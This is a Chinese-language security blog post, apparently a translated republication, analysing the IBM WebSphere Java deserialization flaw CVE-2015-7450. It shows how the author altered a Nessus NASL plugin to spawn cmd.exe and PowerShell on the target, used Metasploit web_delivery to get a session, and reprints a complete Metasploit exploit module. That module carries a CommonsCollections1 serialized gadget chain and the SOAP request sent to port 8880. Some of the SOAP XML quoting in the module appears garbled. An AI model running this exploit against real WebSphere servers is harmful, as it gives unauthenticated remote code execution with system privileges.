IBM WebSphere java反序列化漏洞分析

Nessus它是首选的漏洞扫描程序,它可以找到任何潜在的漏洞。在查看Nessus报告信息时我发现了一个IBM知名的WebSphere Application Server漏洞。

NESSUS报告

Nessus的报告上写着,IBM的WAS应用程序中存在以下关键漏洞,并且能够通过发送精心设计的Java对象来利用Java反序列化

Capture1

漏洞信息

CVE ID: CVE-2015-7450

描述:在某些IBM analytics,业务解决方案,cognitive,移动和社交产品,IT基础架构中的序列化对象接口,允许远程攻击者通过一个精心设计的序列化Java对象执行任意命令,这些对象与Apache Commons Collections库中的InvokerTransformer类相关。

更多信息: https : //cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7450

方法

Nessus分析

我很好奇上面的Nessus漏洞报告中Nessus如何能够利用它。插件的ID是:87171所以我执行了一个快速grep操作,以找到它的全名,并继续分析。

Capture2

Responsible Plugin’name:id’

Nessus使用NASL (Nessus攻击脚本语言)作为脚本语言,因此它很简单,很容易使用。你可以在这里找到有关NASL工具运行/使用的其他信息和示例。

插件的NASL代码很简单。首先执行关于主机操作系统的“信息收集”,然后执行WAS应用程序正在侦听的默认端口(8880)上的请求。

img1

我们想在拦截通信路径看到以下SOAP响应。

burp1 (1)

以下nasl代码行正是它所描述的。我们根据主机操作系统存在的漏洞应用程序来执行ICMP回应请求。我们的WAS应用程序已安装在Windows Server 2008 R2上了,因此我们执行以下ping命令。

ping -n  10 192.168.1.7

其中192.168.1.7安装了Nessus的主机。

ping

其余代码是它构建一个适当的SOAP请求封装了任意ping命令,然后对引用目标执行的POST操作。

soap
soap

我很好奇如果不是ping请求执行,而是我自己的操作,像调用cmd.exe进程没有任何进一步的参数,棘手的部分来自于调用ping操作行。所以我们修改上面提到的代码部分,像这样。

# if("windows" >< tolower(os)) ping_cmd = "ping -n 10 ";
# else ping_cmd = "ping -c 10 -p " + string(id_tag) + " ";
rce_cmd = "cmd.exe";
# ping_cmd += this_host();
ping_cmd = rce_cmd;

我在if_else语句中加上了注释,并执行 OS fingerprinting,远程主机也在Windows Server 2008 R2下运行了。这时我启动NASL工具,并等待cmd进程启动远程系统。在这一点上,我想对Alexios Dimitriadis表示非常感谢,因为他经过大量的研究发现了如何正确执行nasl。

注意:值得提及的是,在执行脚本期间,如果添加了audit-trail选项,可能会出现以下verbose消息。脚本报告端口8880不受影响,但在这种情况下是一个false-positive消息,因为nasl脚本等待ping请求,以验证漏洞的存在。

nasl_script

检查alonsgide脚本是否有执行目标机器的当前进程,我们的cmd.exe进程已经在java.exe下启动,同时用系统特权在Java平台上运行着。

cmd_process

与METASPLOIT交互

分析Web传递有效负载

在这一点上,我试图遵循一个简单的方法,以验证是否使用powershell代码来进一步利用,所以我在nasl脚本中嵌入以下powershell代码行。

rce_cmd = "powershell.exe -nop -ep bypass -c ping 192.168.1.7";

Nessus再次验证,开发成功,我执行ping操作回我的主机。

was_naslwin_procex

我想到的第一件事是使用web_delivery模块启动metasploit并将输出解析到nasl脚本。这发生了一个很好的,完全分阶段的会话返回。

msf_webdel

创建METASPLOIT模块

为了便于控制和利用有漏洞的主机,我开始创建自己的metasploit模块。你可以在GitHub的主要metasploit框架库找到它,你也可以在gueue模块中看到我们的讨论。

你可以随时下载它或使用它,以防万一你面临上述漏洞,但是并不建议你利用这个漏洞来损害他人。

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 
 include Msf::Exploit::Remote::HttpClient
 include Msf::Exploit::Powershell
 
 def initialize(info={})
 super(update_info(info,
 'Name' => "IBM WebSphere RCE Java Deserialization Vulnerability",
 'Description' => %q{
 This module exploits a vulnerability in IBM's WebSphere Application Server. An unsafe deserialization
 call of unauthenticated Java objects exists to the Apache Commons Collections (ACC) library, which allows
 remote arbitrary code execution. Authentication is not required in order to exploit this vulnerability.
 },
 'License' => MSF_LICENSE,
 'Author' =>
 [
 'Liatsis Fotios @liatsisfotios' # Metasploit Module
 
 # Thanks for helping me:
 # # # # # # # # # # # #
 
 # Kyprianos Vasilopoulos @kavasilo # Implemented and reviewed - Metasploit module
 # Dimitriadis Alexios @AlxDm_ # Assistance and code check
 # Kotsiopoulos Panagiotis # Guidance about Size and Buffer implementation
 ],
 'References' =>
 [
 ['CVE', '2015-7450'],
 ['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial
/payloads/CommonsCollections1.java'],
 ['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-
jenkins-opennms-and-your-application-have-in-common-this-vulnerability'],
 ['URL', 'https://www.tenable.com/plugins/index.php?view=single&id=87171']
 ],
 'Platform' => 'win',
 'Targets' =>
 [
 [ 'IBM WebSphere 7.0.0.0', {} ]
 ],
 'DisclosureDate' => "Nov 6 2015",
 'DefaultTarget' => 0,
 'DefaultOptions' => {
 'SSL' => true,
 'WfsDelay' => 20
 }))
 
 register_options([
 OptString.new('TARGETURI', [true, 'The base IBM\'s WebSphere SOAP path', '/']),
 Opt::RPORT('8880')
 ], self.class)
 end
 
 
 def exploit
 # Decode - Generate - Set Payload / Send SOAP Request
 soap_request(set_payload)
 end
 
 def set_payload
 # CommonCollections1 Serialized Streams
 ccs_start = "rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAg
ACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAEADWphdmEudX
RpbC5NYXB4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdG
lvbkhhbmRsZXI7eHBzcQB+AABzcgAqb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLm1hcC5MYXp5TWFwbuWUgp55EJQDAAFMAA
dmYWN0b3J5dAAsTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHNyADpvcmcuYXBhY2hlLmNvbW1vbn
MuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVyMMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJzdAAtW0xvcmcvYX
BhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHB1cgAtW0xvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuVH
JhbnNmb3JtZXI7vVYq8dg0GJkCAAB4cAAAAAVzcgA7b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW
50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHQAEkxqYXZhL2xhbmcvT2JqZWN0O3hwdnIAEWphdmEubGFuZy5SdW50aW
1lAAAAAAAAAAAAAAB4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh+
j/a3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2
lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAACdAAKZ2
V0UnVudGltZXVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAHQACWdldE1ldGhvZHVxAH4AHgAAAAJ2cgAQamF2YS
5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB+AB5zcQB+ABZ1cQB+ABsAAAACcHVxAH4AGwAAAAB0AAZpbnZva2V1cQB+AB4AAAACdn
IAEGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwdnEAfgAbc3EAfgAWdXIAE1tMamF2YS5sYW5nLlN0cmluZzut0lbn6R17RwIAAH
hwAAAAAXQ="
 ccs_end = "dAAEZXhlY3VxAH4AHgAAAAFxAH4AI3NxAH4AEXNyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4c
gAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG
9ySQAJdGhyZXNob2xkeHA/QAAAAAAAEHcIAAAAEAAAAAB4eHZyABJqYXZhLmxhbmcuT3ZlcnJpZGUAAAAAAAAAAAAAAHhwcQB+ADo="
 
 # Generate Payload
 payload_exec = invoke_ccs(ccs_start) + gen_payload + invoke_ccs(ccs_end)
 payload_exec = Rex::Text.encode_base64(payload_exec)
 end
 
 def invoke_ccs(serialized_stream)
 # Decode Serialized Streams
 serialized_stream = Rex::Text.decode_base64(serialized_stream)
 end
 
 def gen_payload
 # Staging Native Payload
 exec_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
 exec_cmd = exec_cmd.gsub("%COMSPEC% /b /c start /b /min ", "")
 
 # Size up RCE - Buffer
 cmd_lng = exec_cmd.length
 lng2str = "0" + cmd_lng.to_s(16)
 buff = [lng2str].pack("H*")
 
 rce_pld = buff + exec_cmd
 end
 
 def soap_request(inject_payload)
 # SOAP Request
 req = "<!--?xml version='1.0' encoding='UTF-8'?-->" + "\r\n"
 req += "<soap-env:envelope xmlns:soap-env="\"http://schemas.xmlsoap.org/soap/envelope/\"" 
xmlns:xsi="\"http://www.w3.org/2001/XMLSchema-instance\""
 xmlns:xsd="\"http://www.w3.org/2001/XMLSchema\"">" + "\r\n"
 req += "<soap-env:header xmlns:ns0="\"admin\"" ns0:wasremoteruntimeversion="\"7.0.0.0\"" 
ns0:jmxmessageversion="\"1.0.0\"" ns0:securityenabled="\"true\"" ns0:jmxversion="\"1.2.0\"">" + "\r\n"
 req += "<loginmethod>BasicAuth</loginmethod>" + "\r\n"
 req += "</soap-env:header>" + "\r\n"
 req += "<soap-env:body>" + "\r\n"
 req += "<ns1:getattribute xmlns:ns1="\"urn:AdminService\"" 
soap-env:encodingstyle="\"http://schemas.xmlsoap.org/soap/encoding/\"">" + "\r\n"
 req += "<objectname xsi:type="\"ns1:javax.management.ObjectName\"">" 
+ inject_payload + "</objectname>" + "\r\n"
 req += "<attribute xsi:type="\"xsd:string\"">ringBufferSize</attribute>" + "\r\n"
 req += "</ns1:getattribute>" + "\r\n"
 req += "</soap-env:body>" + "\r\n"
 req += "</soap-env:envelope>" + "\r\n"
 
 uri = target_uri.path
 
 res = send_request_raw({
 'method' => 'POST',
 'version' => '1.1',
 'raw_headers' => "Content-Type: text/xml; 
charset=utf-8" + "\r\n" + "SOAPAction: \"urn:AdminService\"" + "\r\n",
 'uri' => normalize_uri(uri),
 'data' => req
 })
 end
 
end

快速演示:https://youtu.be/HGEGMAnSj7I

参考文献:

*参考:liatsisfotis,MottoIN小编编译发布,转载请注明来自MottoIN


为您推荐了相关的技术文章:

  1. 王掌柜带你玩转 Zapier - Zapier vs. IFTTT
  2. Struts2 历史 RCE 漏洞回顾不完全系列
  3. 利用 Python 特性在 Jinja2 模板中执行任意代码
  4. 看雪CTF2017第六题 Ericky-apk writeup
  5. S2-017重现过程

原文链接: www.mottoin.com